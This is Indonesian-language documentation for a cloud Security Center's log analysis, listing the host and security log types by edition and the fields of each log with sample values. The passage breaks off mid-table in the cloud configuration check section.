Analisis log Security Center memusatkan data aktivitas host dan event keamanan untuk auditing, pelacakan insiden, serta deteksi ancaman. Dokumen ini mencakup jenis log yang didukung, ketersediaannya berdasarkan edisi, bidang log, serta siklus pengumpulan.
Dukungan versi
Jenis log yang tersedia bergantung pada edisi atau tingkat perlindungan Security Center Anda.
Langganan
Log host
Jenis Log | Basic | Anti-virus | Advanced | Enterprise | Ultimate |
Log Alur Login | |||||
Log Koneksi Jaringan | |||||
Log Startup Proses | |||||
Log Serangan Brute-force | |||||
Log Permintaan DNS | |||||
Log Event Klien | |||||
Log Snapshot Akun | |||||
Log Snapshot Jaringan | |||||
Log Snapshot Proses | |||||
Log Modul Biner | |||||
Memproses Log Penulisan File | |||||
Log Operasi Registri |
Log keamanan
Jenis Log | Basic | Anti-virus | Advanced | Enterprise | Ultimate |
Log Peringatan Keamanan | Catatan Hanya mencatat peringatan yang didukung oleh edisi Basic. | ||||
Log Kerentanan | Catatan Hanya mencatat kerentanan yang didukung oleh edisi Basic. | ||||
Log Pertahanan Jaringan | |||||
Log Event Pemantauan File Inti | |||||
Log Pemeriksaan Baseline CSPM | |||||
Log Pemeriksaan Konfigurasi Platform Cloud CSPM | |||||
Log Perlindungan Aplikasi | |||||
Log Deteksi File Berbahaya | |||||
Log Deteksi Tanpa Agen |
Log layanan bernilai tambah
Jika Anda mengaktifkan salah satu layanan bernilai tambah berikut, Security Center akan menganalisis log yang dihasilkannya:
Malicious File Detection
Agentless Detection
Application Protection
CSPM(Baseline Check dan Cloud Service Configuration Risk)
Bayar sesuai penggunaan
Jika Anda membeli layanan bayar sesuai penggunaan Host and Container Security, jenis log yang tersedia bervariasi berdasarkan tingkat perlindungan yang ditetapkan untuk setiap server.
Log Host
Jenis Log | Unprotected | Antivirus | Host Protection | Hosts and Container Protection |
Log Alur Login | ||||
Log Koneksi Jaringan | ||||
Log Startup Proses | ||||
Log Serangan Brute-force | ||||
Log Permintaan DNS | ||||
Log Event Klien | ||||
Log Snapshot Akun | ||||
Log Snapshot Jaringan | ||||
Log Snapshot Proses |
Log Keamanan
Jenis Log | Unprotected | Antivirus | Host Protection | Hosts and Container Protection |
Log Peringatan Keamanan | Catatan Hanya mencatat peringatan yang didukung oleh tingkat Tidak Dilindungi. | |||
Log Kerentanan | Catatan Hanya mencatat kerentanan yang didukung oleh tingkat Tidak Dilindungi. | |||
Log Pertahanan Jaringan | ||||
Log Event Pemantauan File Inti |
Log Layanan Bayar Sesuai Penggunaan
Jika Anda mengaktifkan salah satu layanan bayar sesuai penggunaan berikut, Security Center akan menganalisis log yang dihasilkannya:
Malicious File Detection
Agentless Detection
Application Protection
CSPM(Baseline Check, [CONREF:sas.configCheck.config.check])
Ikhtisar jenis log
Sampel log dan deskripsi bidang hanya untuk referensi. Bidang dapat berubah seiring pembaruan produk. Data aktual di SLS mencerminkan skema terkini.
Log host
Log alur login
__topic__: aegis-log-loginKonten log: Mencatat event login server, termasuk IP sumber, username, dan hasilnya.
Deskripsi fitur: Memantau aktivitas pengguna dan mendeteksi perilaku anomali.
PentingSecurity Center tidak mengumpulkan log alur login untuk server yang menjalankan Windows Server 2008.
Siklus pengumpulan: Real-time.
Log koneksi jaringan
__topic__: aegis-log-networkKonten log: Mencatat koneksi jaringan real-time pada server, termasuk 5-tuple dan proses terkait.
Deskripsi fitur: Mengidentifikasi pola koneksi anomali, mendeteksi serangan jaringan, dan mengoptimalkan kinerja.
CatatanAgen hanya mengumpulkan subset status koneksi antara pembentukan dan terminasi. Trafik inbound tidak dicatat.
Siklus pengumpulan: Real-time.
Log startup proses
__topic__: aegis-log-processKonten log: Mencatat event startup semua proses baru, termasuk nama proses, argumen command-line, dan proses induk.
Deskripsi fitur: Melacak startup proses, mendeteksi perilaku abnormal, dan mengidentifikasi intrusi malware.
Siklus pengumpulan: Real-time. Log dilaporkan segera setelah proses dimulai.
Log modul biner
__topic__: aegis-log-bin-moduleKonten log: Mencatat informasi tentang modul biner yang dimuat oleh proses, termasuk path file modul, nilai hash, ukuran, dan waktu pembuatan.
Deskripsi fitur: Memahami dependensi modul saat runtime dan mendeteksi pemuatan modul anomali atau injeksi DLL berbahaya.
Siklus pengumpulan: Real-time.
Memproses log penulisan file
__topic__: aegis-log-file-eventKonten log: Mencatat event penulisan file oleh proses, termasuk path file, informasi proses, dan informasi kontainer.
Deskripsi fitur: Melacak perilaku penulisan file dan mendeteksi operasi file anomali, pembuatan file berbahaya, serta risiko eksfiltrasi data.
Siklus pengumpulan: Real-time.
Log operasi registri
__topic__: aegis-log-regeditKonten log: Mencatat event operasi registri, termasuk path kunci registri, nilai, tipe data, dan proses yang melakukan operasi tersebut.
Deskripsi fitur: Memantau perubahan registri dan mendeteksi malware yang memodifikasi konfigurasi sistem atau membuat persistensi.
Siklus pengumpulan: Real-time.
Log serangan brute-force
__topic__: aegis-log-crackKonten log: Mencatat upaya serangan brute-force terhadap sistem, aplikasi, dan akun.
Deskripsi fitur: Mengidentifikasi serangan brute-force, mendeteksi login anomali, kata sandi lemah, dan kebocoran kredensial, serta mendukung respons insiden dan analisis forensik.
Siklus pengumpulan: Real-time.
Log snapshot akun
__topic__: aegis-snapshot-hostKonten log: Mencatat detail akun pengguna termasuk username, kebijakan kata sandi, dan riwayat login.
Deskripsi fitur:
PentingBandingkan snapshot dari waktu ke waktu untuk memantau perubahan akun dan mendeteksi akses tidak sah serta anomali status akun.
Siklus pengumpulan: Otomatis, berdasarkan interval sidik jari aset (default: sekali sehari). Pengumpulan manual juga didukung.
Log snapshot jaringan
__topic__: aegis-snapshot-portKonten log: Mencatat koneksi jaringan termasuk 5-tuple, status, dan proses terkait.
Deskripsi fitur: Mengidentifikasi koneksi aktif, pola anomali, dan potensi serangan jaringan.
Siklus pengumpulan: Otomatis, berdasarkan interval sidik jari aset (default: sekali sehari). Pengumpulan manual juga didukung.
Log snapshot proses
__topic__: aegis-snapshot-processKonten log: Mencatat aktivitas proses termasuk ID proses, nama, dan waktu startup.
Deskripsi fitur: Memantau aktivitas dan konsumsi sumber daya proses; mendeteksi proses abnormal, penggunaan CPU berlebihan, dan kebocoran memori.
Siklus pengumpulan: Otomatis, berdasarkan interval sidik jari aset (default: sekali sehari). Pengumpulan manual juga didukung.
Log permintaan DNS
__topic__: aegis-log-dns-queryKonten log: Mencatat kueri DNS yang diprakarsai oleh server, termasuk nama domain, tipe kueri, dan sumbernya.
Deskripsi fitur: Menganalisis aktivitas DNS dan mendeteksi kueri anomali, pembajakan domain, atau poisoning.
PentingPengumpulan log tidak didukung untuk server Linux dengan versi kernel lebih awal dari 4.x.x.
Siklus pengumpulan: Real-time.
Log event klien
__topic__: aegis-log-clientKonten log: Mencatat event online/offline klien Security Center.
Deskripsi fitur: Memantau ketersediaan klien.
Siklus pengumpulan: Real-time.
Log keamanan
Semua log keamanan dikumpulkan secara real-time.
Log kerentanan
__topic__: sas-vul-logKonten log: Mencatat kerentanan yang ditemukan, termasuk nama, status, dan tindakan penanganan.
Deskripsi fitur: Melacak kerentanan, menilai risiko keamanan, dan memprioritaskan remediasi.
Log pemeriksaan baseline CSPM
__topic__: sas-hc-logKonten log: Mencatat hasil pemeriksaan baseline termasuk level, kategori, dan tingkat risiko.
Deskripsi fitur: Menilai postur keamanan baseline dan mengidentifikasi risiko konfigurasi.
CatatanHanya item pemeriksaan yang gagal pertama kali dicatat, bersama dengan item yang sebelumnya lolos tetapi gagal saat pemeriksaan ulang.
Log peringatan keamanan
__topic__: sas-security-logKonten log: Mencatat peringatan keamanan termasuk sumber data, detail, dan tingkat keparahan.
Deskripsi fitur: Memahami ancaman keamanan dan merespons secara cepat.
Log pemeriksaan konfigurasi platform cloud CSPM
__topic__: sas-cspm-logKonten log: Mencatat hasil pemeriksaan konfigurasi platform cloud dan operasi daftar putih.
Deskripsi fitur: Mengidentifikasi masalah konfigurasi dan risiko keamanan di platform cloud.
Log pertahanan jaringan
__topic__: sas-net-blockKonten log: Mencatat event serangan jaringan, termasuk tipe serangan dan alamat IP sumber serta tujuan.
Deskripsi fitur: Mendeteksi serangan jaringan, merespons ancaman, dan meningkatkan keamanan jaringan.
Log perlindungan aplikasi
__topic__: sas-rasp-logKonten log: Mencatat peringatan serangan RASP, termasuk tipe serangan, data perilaku, dan IP penyerang.
Deskripsi fitur: Mendeteksi serangan lapisan aplikasi dan meningkatkan keamanan runtime.
Log deteksi file berbahaya
__topic__: sas-filedetect-logKonten log: Mencatat hasil deteksi file berbahaya, termasuk informasi file, skenario deteksi, dan hasilnya.
Deskripsi fitur: Mengidentifikasi program berbahaya dalam file offline atau penyimpanan cloud untuk penanganan tepat waktu.
Log event pemantauan file inti
__topic__: aegis-file-protect-logKonten log: Mencatat peringatan pemantauan file inti, termasuk path file, tipe operasi, dan tingkat peringatan.
Deskripsi fitur: Mendeteksi pencurian atau perusakan file inti.
Log deteksi tanpa agen
__topic__: sas-agentless-logKonten log: Mencatat risiko keamanan di server cloud, snapshot disk, dan gambar, termasuk kerentanan, pemeriksaan baseline, sampel berbahaya, dan file sensitif.
Deskripsi fitur: Melihat risiko keamanan aset dalam periode waktu dan mengidentifikasi potensi ancaman.
Bidang log host
Log alur login
Bidang | Deskripsi | Contoh |
instance_id | ID instans. | i-2zeg4zldn8zypsfg**** |
host_ip | Alamat IP server. | 192.168.XX.XX |
sas_group_name | Grup aset server di Security Center. | default |
uuid | UUID server. | 5d83b26b-b7ca-4a0a-9267-12**** |
src_ip | Alamat IP sumber yang digunakan untuk login ke server. | 221.11.XX.XX |
dst_port | Port yang digunakan untuk login. | 22 |
login_type | Tipe login. Nilai meliputi namun tidak terbatas pada: | SSH |
username | Username yang digunakan untuk login. | admin |
login_count | Jumlah login. Login berulang dalam 1 menit digabung menjadi satu entri. Misalnya, | 3 |
start_time | Timestamp mulai, dalam detik. Juga digunakan untuk menunjukkan waktu kejadian. | 1719472214 |
auth_type | Tipe autentikasi, tipe string.
| 1 |
success | Menunjukkan apakah login berhasil. Nilai: | true |
pid | PID proses autentikasi. | 12345 |
src_port | Nomor port sumber login, tipe string. | 43006 |
ssh_fingerprint | Sidik jari kunci SSH yang digunakan untuk login, tipe string. Saat menggunakan autentikasi berbasis kunci, bidang ini mencatat sidik jari kunci yang sesuai. Saat menggunakan autentikasi kata sandi, bidang ini kosong. | SHA256:xxxxxxxxxxxx |
Log koneksi jaringan
Bidang | Deskripsi | Contoh |
cmd_chain | Rantai proses. | [ {"9883":"bash -c kill -0 -- -'6274'"} ... ] |
cmd_chain_index | Indeks rantai proses. Gunakan indeks ini untuk mencari rantai proses yang sesuai. | B184 |
container_hostname | Hostname dalam kontainer. | nginx-ingress-controller-765f67fd4d-**** |
container_id | ID kontainer. | 4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d**** |
container_image_id | ID gambar kontainer. | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0**** |
container_image_name | Nama gambar kontainer. | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-**** |
container_name | Nama kontainer. | nginx-ingress-**** |
container_pid | ID proses dalam kontainer. | 0 |
net_connect_dir | Arah koneksi jaringan. Nilai: | in |
dst_ip | Alamat IP penerima koneksi. Jika | 192.168.XX.XX |
dst_port | Port penerima koneksi. | 443 |
instance_id | ID instans. | i-2zeg4zldn8zypsfg**** |
host_ip | Alamat IP server. | 192.168.XX.XX |
parent_proc_name | Nama file proses induk. | /usr/bin/bash |
pid | ID proses. | 14275 |
ppid | ID proses induk. | 14268 |
proc_name | Nama proses. | nginx |
proc_path | Path proses. | /usr/local/nginx/sbin/nginx |
proc_start_time | Waktu startup proses. | N/A |
connection_type | Protokol. Nilai: | tcp |
sas_group_name | Grup aset server di Security Center. | default |
src_ip | Alamat IP sumber. | 100.127.XX.XX |
src_port | Port sumber. | 41897 |
srv_comm | Nama perintah yang terkait dengan proses kakek. | containerd-shim |
status | Status koneksi jaringan. Nilai: 1 (Closed); 2 (Listening); 3 (SYN sent); 4 (SYN received); 5 (Established); 6 (Close wait); 7 (Closing); 8 (FIN wait 1); 9 (FIN wait 2); 10 (Time wait); 11 (TCB deleted). | 5 |
type | Tipe koneksi jaringan real-time. Nilai: | listen |
uid | ID pengguna proses. | 101 |
username | Username proses. | root |
uuid | UUID server. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | Timestamp mulai, dalam detik. Juga digunakan untuk menunjukkan waktu kejadian. | 1719472214 |
Log startup proses
Bidang | Deskripsi | Contoh |
cmd_chain | Rantai proses. | [ {"9883":"bash -c kill -0 -- -'6274'"} ... ] |
cmd_chain_index | Indeks rantai proses. Gunakan indeks ini untuk mencari rantai proses yang sesuai. | B184 |
cmd_index | Indeks setiap parameter dalam command line. Setiap pasangan nilai menandai posisi awal dan akhir parameter. | 0,3,5,8 |
cmdline | Command line lengkap yang digunakan untuk memulai proses. | ipset list KUBE-6-CLUSTER-IP |
comm | Nama perintah yang terkait dengan proses. | N/A |
container_hostname | Hostname dalam kontainer. | nginx-ingress-controller-765f67fd4d-**** |
container_id | ID kontainer. | 4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d**** |
container_image_id | ID gambar kontainer. | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0**** |
container_image_name | Nama gambar kontainer. | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-**** |
container_name | Nama kontainer. | nginx-ingress-**** |
container_pid | ID proses dalam kontainer. | 0 |
cwd | Direktori kerja proses. | N/A |
proc_name | Nama file proses. | ipset |
proc_path | Path lengkap file proses. | /usr/sbin/ipset |
gid | ID grup proses. | 0 |
groupname | Nama grup pengguna. | group1 |
instance_id | ID instans. | i-2zeg4zldn8zypsfg**** |
host_ip | Alamat IP server. | 192.168.XX.XX |
parent_cmd_line | Command line proses induk. | /usr/local/bin/kube-proxy --config=/var/lib/kube-proxy/config.conf --hostname-override=cn-beijing.192.168.XX.XX |
parent_proc_name | Nama file proses induk. | kube-proxy |
parent_proc_path | Path lengkap file proses induk. | /usr/local/bin/kube-proxy |
pid | ID proses. | 14275 |
ppid | ID proses induk. | 14268 |
proc_start_time | Waktu startup proses. | 2024-08-01 16:45:40 |
parent_proc_start_time | Waktu startup proses induk. | 2024-07-12 19:45:19 |
sas_group_name | Grup aset server di Security Center. | default |
srv_cmd | Command line proses kakek. | /usr/bin/containerd |
tty | Terminal login. N/A menunjukkan akun belum pernah login ke terminal. | N/A |
uid | ID pengguna. | 123 |
username | Username proses. | root |
uuid | UUID server. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | Timestamp mulai, dalam detik. Juga digunakan untuk menunjukkan waktu kejadian. | 1719472214 |
Log serangan brute-force
Bidang | Deskripsi | Contoh |
instance_id | ID instans. | i-2zeg4zldn8zypsfg**** |
host_ip | Alamat IP server yang mengalami serangan brute-force. | 192.168.XX.XX |
sas_group_name | Grup aset server di Security Center. | default |
uuid | UUID server yang mengalami serangan brute-force. | 5d83b26b-b7ca-4a0a-9267-12***** |
login_count | Jumlah upaya login gagal. Upaya berulang dalam 1 menit digabung menjadi satu entri. Misalnya, | 3 |
src_ip | Alamat IP sumber upaya login. | 47.92.XX.XX |
dst_port | Port login. | 22 |
login_type | Tipe login. Nilai: | SSH |
username | Username login. | user |
start_time | Timestamp mulai, dalam detik. Juga digunakan untuk menunjukkan waktu kejadian. | 1719472214 |
Log snapshot akun
Bidang | Deskripsi | Contoh |
account_expire | Tanggal kedaluwarsa akun. Nilai | never |
domain | Layanan domain atau direktori tempat akun tersebut berada. N/A berarti akun tidak termasuk dalam domain apa pun. | N/A |
groups | Grup yang dimiliki akun. N/A berarti akun tidak termasuk dalam grup apa pun. | ["nscd"] |
home_dir | Direktori home, lokasi default untuk menyimpan dan mengelola file dalam sistem. | /Users/abc |
instance_id | ID instans. | i-2zeg4zldn8zypsfg**** |
host_ip | Alamat IP server. | 192.168.XX.XX |
last_chg | Tanggal terakhir kata sandi diubah. | 2022-11-29 |
last_logon | Tanggal dan waktu login terakhir. N/A berarti akun belum pernah digunakan untuk login. | 2023-08-18 09:21:21 |
login_ip | Alamat IP remote dari login terakhir. N/A berarti akun belum pernah digunakan untuk login. | 192.168.XX.XX |
passwd_expire | Tanggal kedaluwarsa kata sandi. Nilai | 2024-08-24 |
perm | Apakah akun memiliki izin root. Nilai: | 0 |
sas_group_name | Grup aset server di Security Center. | default |
shell | Shell Linux. | /sbin/nologin |
status | Status akun pengguna. Nilai: | 0 |
tty | Terminal login. N/A berarti akun belum pernah login ke terminal. | N/A |
username | Username. | nscd |
uuid | UUID server. | 5d83b26b-b7ca-4a0a-9267-12**** |
warn_time | Tanggal pengingat kedaluwarsa kata sandi. Nilai | 2024-08-20 |
start_time | Timestamp mulai, dalam detik. Juga digunakan untuk menunjukkan waktu kejadian. | 1719472214 |
Log snapshot jaringan
Bidang | Deskripsi | Contoh |
net_connect_dir | Arah koneksi jaringan. Nilai: | in |
dst_ip | Alamat IP peer, umumnya kosong. Catatan: Karena hanya log dengan status 2 yang dikirimkan, | |
dst_port | Port penerima koneksi. | 443 |
instance_id | ID instans. | i-2zeg4zldn8zypsfg**** |
host_ip | Alamat IP server. | 192.168.XX.XX |
pid | ID proses. | 682 |
proc_name | Nama proses. | sshd |
connection_type | Protokol. Nilai: | tcp4 |
sas_group_name | Grup aset server di Security Center. | default |
src_ip | Alamat IP lokal. | 100.127.XX.XX |
src_port | Port yang sedang mendengarkan. | 41897 |
status | Nilainya adalah 2, menunjukkan port sedang mendengarkan; | 5 |
uuid | UUID server. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | Timestamp mulai, dalam detik. Juga digunakan untuk menunjukkan waktu kejadian. | 1719472214 |
Log snapshot proses
Bidang | Deskripsi | Contoh |
cmdline | Command line lengkap yang digunakan untuk memulai proses. | /usr/local/share/assist-daemon/assist_daemon |
instance_id | ID instans. | i-2zeg4zldn8zypsfg**** |
host_ip | Alamat IP server. | 192.168.XX.XX |
md5 | Hash MD5 file biner. File yang lebih besar dari 1 MB tidak dihitung. | 1086e731640751c9802c19a7f53a64f5 |
proc_name | Nama file proses. | assist_daemon |
proc_path | Path lengkap file proses. | /usr/local/share/assist-daemon/assist_daemon |
pid | ID proses. | 1692 |
pname | Nama file proses induk. | systemd |
sas_group_name | Grup aset server di Security Center. | default |
proc_start_time | Waktu startup proses. Bidang bawaan. | 2023-08-18 20:00:12 |
uid | ID pengguna proses. | 101 |
username | Username proses. | root |
uuid | UUID server. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | Timestamp mulai, dalam detik. Juga digunakan untuk menunjukkan waktu kejadian. | 1719472214 |
Log permintaan DNS
Bidang | Deskripsi | Contoh |
domain | Nama domain yang sesuai dengan permintaan DNS. | example.aliyundoc.com |
instance_id | ID instans. | i-2zeg4zldn8zypsfg**** |
host_ip | Alamat IP server yang memulai permintaan DNS. | 192.168.XX.XX |
pid | ID proses yang memulai permintaan DNS. | 3544 |
ppid | ID proses induk yang memulai permintaan DNS. | 3408 |
cmd_chain | Rantai proses yang memulai permintaan DNS. | "3544":"\"C:\\Program Files (x86)\\Alibaba\\Aegis\\AliDetect\\AliDetect.exe\"" |
cmdline | Command line yang memulai permintaan DNS. | C:\Program Files (x86)\Alibaba\Aegis\AliDetect\AliDetect.exe |
proc_path | Path proses yang memulai permintaan DNS. | C:/Program Files (x86)/Alibaba/Aegis/AliDetect/AliDetect.exe |
sas_group_name | Grup aset server di Security Center. | default |
time | Waktu event permintaan DNS ditangkap. Waktu ini umumnya sesuai dengan waktu terjadinya permintaan DNS. | 2023-08-17 20:05:04 |
uuid | UUID server yang memulai permintaan DNS. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | Timestamp mulai, dalam detik. Juga digunakan untuk menunjukkan waktu kejadian. | 1719472214 |
Log event klien
Bidang | Deskripsi | Contoh |
uuid | UUID server. | 5d83b26b-b7ca-4a0a-9267-12**** |
host_ip | Alamat IP server. | 192.168.XX.XX |
agent_version | Versi klien. | aegis_11_91 |
last_login | Timestamp login sebelumnya, dalam milidetik. | 1716444387617 |
platform | Tipe sistem operasi. Nilai: | linux |
region_id | ID wilayah tempat server berada. | cn-beijing |
status | Status klien. Nilai: | online |
start_time | Timestamp mulai, dalam detik. Juga digunakan untuk menunjukkan waktu kejadian. | 1719472214 |
Log modul biner
Bidang | Deskripsi | Contoh |
user_id | ID pengguna. | 123 |
host_ip | Alamat IP mesin klien. | 1.2.3.4 |
uuid | UUID server. | inet-eb7c23e9-1352-4f03-a1b3-73800d3524da |
proc_list | Daftar proses yang memuat modul, dalam format JSON. | [{"path":"C:/Windows/System32/svchost.exe","cmdline":"...","pid":84,"md5":"..."}] |
file_path | Path file modul. | c:\\windows\\system32\\msvcrt.dll |
md5 | Hash MD5 modul. | d80c5d199b7700b89dbdc52ab58c7519 |
sha256 | Hash SHA256 modul. String kosong menunjukkan belum dihitung. | |
file_size | Ukuran modul, dalam byte. | 800008 |
bin_create | Waktu pembuatan modul. | 2017-06-08 11:49:55 |
bin_modified | Waktu modifikasi terakhir modul. | 2014-10-29 11:06:28 |
source | Identifier tipe sumber. | 5 |
start_time | Timestamp penulisan log, dalam detik (timestamp Unix). | 1719472214 |
Log file tulis proses
Bidang | Deskripsi | Contoh |
user_id | ID pengguna. | 123 |
host_ip | Alamat IP mesin klien. | 1.2.3.4 |
uuid | UUID server. | inet-eb7c23e9-1352-4f03-a1b3-73800d3524da |
proc_path | Path proses yang mengoperasikan file. | /home/shared/app_bin/maple_ffmpeg |
cmdline | Command line lengkap proses. | /home/shared/app_bin/maple_ffmpeg -y -threads 4 -i ... |
event_type | Tipe event operasi file, seperti open atau write. | open |
file_path | Path file yang dioperasikan. | /home/shared/app-video-trans/dbe36b1f-.../... |
parent_proc_path | Path file eksekusi proses induk. | /usr/java/jdk1.8.0_171/bin/java |
pid | ID proses. | 882378 |
ppid | ID proses induk. | 1019718 |
pstime | Waktu startup proses induk. | 2025-10-30 12:02:38 |
proc_start_time | Waktu startup proses. | 2025-10-30 12:02:38 |
cmd_chain | Rantai pemanggilan proses, dalam format JSON. | [{"882378":"/home/shared/app_bin/maple_ffmpeg..."}] |
cmd_chain_index | Identifier indeks rantai perintah. | P47948934 |
srv_cmd | Command line layanan terkait. | /usr/bin/python /usr/bin/supervisord -c /etc/supervisord.conf |
srv_comm | Nama layanan terkait. | supervisord |
flag | Nilai flag operasi file. | 33345 |
old_file_path | Path file asli sebelum rename atau move. | |
username | Username yang melakukan operasi. | |
container_id | ID kontainer. | |
container_name | Nama kontainer. | |
container_hostname | Hostname dalam kontainer. | |
container_image_id | ID gambar kontainer. | |
container_image_name | Nama gambar kontainer. | |
start_time | Timestamp penulisan log, dalam detik (timestamp Unix). | 1719472214 |
Log operasi registri
Bidang | Deskripsi | Contoh |
user_id | ID pengguna. | 123 |
host_ip | Alamat IP mesin klien. | 1.2.3.4 |
uuid | UUID server. | inet-eb7c23e9-1352-4f03-a1b3-73800d3524da |
registry_key | Path kunci registri yang dioperasikan. | \\REGISTRY\\MACHINE\\SOFTWARE\\WOW6432Node\\... |
registry_value | Nilai kunci registri. | N/A |
registry_type | Tipe data kunci registri. | N/A |
key_account | Akun yang melakukan operasi registri. | N/A |
proc_path | Path proses yang melakukan operasi registri. | C:/Program Files (x86)/ManageEngine/UEMS_Agent/bin/DCProcessMonitor.exe |
cmdline | Command line proses. | DCProcessMonitor.exe |
pid | ID proses. | 11060 |
ppid | ID proses induk proses tersebut. | 2272 |
time | Waktu terjadinya operasi registri. | 2025-11-12 10:32:42 |
start_time | Timestamp penulisan log, dalam detik (timestamp Unix). | 1719472214 |
Bidang log keamanan
Log kerentanan
Bidang | Deskripsi | Contoh |
vul_alias_name | Alias kerentanan. | CESA-2023:1335: pembaruan keamanan openssl |
risk_level | Tingkat risiko. Nilai: | later |
extend_content | Informasi kerentanan tambahan dalam format JSON. | {"cveList":["CVE-2023-0286"],"necessity":{...},"os":"centos",...} |
instance_id | ID instans. | i-2zeg4zldn8zypsfg**** |
internet_ip | Alamat IP publik aset. | 39.104.XX.XX |
intranet_ip | Alamat IP pribadi aset. | 192.168.XX.XX |
instance_name | Hostname. | hhht-linux-*** |
vul_name | Nama kerentanan. | centos:7:cesa-2023:1335 |
operation | Tindakan yang dilakukan terhadap kerentanan. Nilai: | new |
status | Status kerentanan. Nilai: 1 (Belum diperbaiki); 2 (Perbaikan gagal); 3 (Rollback gagal); 4 (Sedang memperbaiki); 5 (Sedang rollback); 6 (Sedang verifikasi); 7 (Diperbaiki); 8 (Diperbaiki, perlu restart); 9 (Telah di-rollback); 10 (Diabaikan); 11 (Di-rollback, perlu restart); 12 (Tidak ada); 13 (Tidak valid). | 1 |
tag | Tag kerentanan. Nilai: | oval |
type | Tipe kerentanan. Nilai: | sys |
uuid | UUID server. | ad66133a-dc82-4e5e-9659-a49e3**** |
start_time | Timestamp mulai, dalam detik. Juga digunakan untuk menunjukkan waktu kejadian. | 1719472214 |
Log pemeriksaan baseline CSPM
Bidang | Deskripsi | Contoh |
check_item_name | Nama item pemeriksaan. | Atur interval minimum untuk perubahan kata sandi |
check_item_level | Tingkat keparahan pemeriksaan baseline. Nilai: | medium |
check_type | Tipe item pemeriksaan. | Otentikasi identitas |
instance_id | ID instans. | i-2zeg4zldn8zypsfg**** |
risk_level | Tingkat risiko. Nilai: | medium |
operation | Operasi. Nilai: | new |
risk_name | Nama item risiko. | Pemeriksaan kepatuhan kebijakan kata sandi |
sas_group_name | Grup aset server di Security Center tempat item risiko terdeteksi. | default |
status | Informasi status. Dua set kode status berlaku: Status pemeriksaan baseline: 1 (Gagal); 2 (Sedang verifikasi); 6 (Diabaikan); 7 (Sedang memperbaiki). Status penanganan: 1 (Belum diperbaiki); 2 (Perbaikan gagal); 3 (Rollback gagal); 4 (Sedang memperbaiki); 5 (Sedang rollback); 6 (Sedang verifikasi); 7 (Diperbaiki); 8 (Diperbaiki, perlu restart); 9 (Telah di-rollback); 10 (Diabaikan); 11 (Di-rollback, perlu restart); 12 (Tidak ada); 13 (Tidak valid). | 1 |
sub_type_alias_name | Alias subtipe. | Praktik keamanan terbaik internasional - Pemeriksaan baseline keamanan Ubuntu 16/18/20/22 |
sub_type_name | Nama subtipe baseline. Untuk nilai valid, lihat Daftar tipe dan subtipe baseline. | hc_ubuntu16_cis_rules |
type_alias_name | Alias tipe. | Praktik keamanan terbaik internasional |
type_name | Tipe baseline. Untuk nilai valid, lihat Daftar tipe dan subtipe baseline. | cis |
uuid | UUID server tempat item risiko terdeteksi. | 1ad66133a-dc82-4e5e-9659-a49e3**** |
start_time | Timestamp mulai, dalam detik. Juga digunakan untuk menunjukkan waktu kejadian. | 1719472214 |
Log peringatan keamanan
Bidang | Deskripsi | Contoh |
data_source | Sumber data. Nilai: | aegis_login_log |
detail | Objek terstruktur (JSON) yang memberikan konteks peringatan detail. Bidang bervariasi berdasarkan tipe peringatan. Nilai umum untuk bidang | {"loginSourceIp":"221.11.XX.XX","loginDestinationPort":22,"loginUser":"root",...} |
instance_id | ID instans. | i-2zeg4zldn8zypsfg**** |
internet_ip | Alamat IP publik aset. | 39.104.XX.XX |
intranet_ip | Alamat IP pribadi aset. | 192.168.XX.XX |
level | Tingkat risiko event peringatan. Nilai: | suspicious |
name | Nama peringatan. | Login Anomali - Login Akun ECS Tidak Biasa |
operation | Operasi. Nilai: | new |
status | Status peringatan. Nilai: 1 (Belum ditangani, default untuk peringatan baru); 2 (Diabaikan, setelah mengeksekusi tindakan Abaikan); 8 (Masuk daftar putih, setelah ditambahkan ke daftar putih); 16 (Sedang diproses, selama tindakan akhiri-proses/isolasi-file/daftar-putih); 32 (Telah diproses, setelah penanganan manual atau menyelesaikan tindakan akhiri-proses/isolasi-file); 64 (Kedaluwarsa, jika tidak ada tindakan dalam 30 hari); 513 (Diblokir otomatis, peringatan telah diblokir otomatis oleh fitur pertahanan presisi Security Center dan tidak memerlukan penanganan manual). | 1 |
unique_info | Identifier unik peringatan. | 2536dd765f804916a1fa3b9516b5**** |
uuid | UUID server tempat peringatan dihasilkan. | ad66133a-dc82-4e5e-9659-a49e3**** |
start_time | Timestamp mulai, dalam detik. Juga digunakan untuk menunjukkan waktu kejadian. | 1719472214 |
suspicious_event_id | ID event peringatan. | 650226318 |
handle_time | Timestamp yang sesuai dengan operasi. | 1765272845 |
alert_first_time | Timestamp saat peringatan pertama kali muncul. | 1764226915 |
alert_last_time | Timestamp saat peringatan terakhir kali muncul. | 1765273425 |
strict_mode | Menunjukkan apakah peringatan dalam mode ketat. Nilai: | true |
user_id | ID akun. | 1358******3357 |
Log pemeriksaan konfigurasi platform cloud CSPM
Bidang | Deskripsi | Contoh |
check_id | ID item pemeriksaan. Anda dapat memperoleh ID ini dengan memanggil operasi | 11 |
check_item_name | Nama item pemeriksaan. | Konfigurasi pengambilan origin |
instance_id | ID instans. | i-2zeg4zldn8zypsfg**** |
instance_name | Nama instans. | lsm |
instance_result | Dampak risiko, sebagai string JSON. | {"Checks":[{}],"Columns":[{"key":"RegionIdShow","search":true,...}]} |
instance_sub_type | Subtipe instans. Nilai tergantung pada | INSTANCE |
